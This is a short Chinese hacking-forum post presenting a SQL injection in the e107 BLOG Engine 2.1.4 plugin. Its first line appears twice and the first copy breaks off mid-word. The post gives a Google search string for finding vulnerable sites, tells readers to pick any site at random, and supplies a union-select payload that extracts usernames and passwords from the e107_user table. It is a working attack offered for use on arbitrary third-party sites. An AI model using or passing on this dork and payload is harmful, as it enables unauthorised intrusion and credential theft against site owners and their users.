转载请注明:天阳网络技术联盟 http://bbs.tian6.com 其实这个洞是幻影发的。。。。。 这次给大家带来的是 e107 Plugin BLOG Engine 2.1.4 Remote SQL Inj PHP远程注入漏洞,非常的简单。 首先用GOOGLE搜索: [Copy to clipboard] [ - ]CODE: allinu
转载请注明:天阳网络技术联盟 http://bbs.tian6.com 其实这个洞是幻影发的。。。。。 这次给大家带来的是 e107 Plugin BLOG Engine 2.1.4 Remote SQL Inj PHP远程注入漏洞,非常的简单。 首先用GOOGLE搜索: [Copy to clipboard] [ - ]CODE: allinurl:"macgurublog.php?uid=" 在里面随便选择一个站,打开后在UID=后输入: [Copy to clipboard] [ - ]CODE: -1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
